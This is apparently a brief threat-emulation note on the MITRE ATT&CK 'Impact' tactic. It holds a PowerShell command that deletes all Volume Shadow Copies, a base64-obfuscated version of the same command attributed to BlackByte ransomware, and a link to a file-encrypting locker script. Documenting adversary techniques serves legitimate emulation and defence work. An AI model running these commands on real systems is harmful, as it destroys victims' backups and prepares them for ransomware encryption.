Impact
The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/
Remove Volume Shadow Copies
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
The threat actor TTP is associated with BlackByte and executes the above as base64.
powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlA HQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAb wB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0A CAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
PowerShell Encryption Routine
A trivial example of encrypting files recursively with a random interger as the key
https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1
Last updated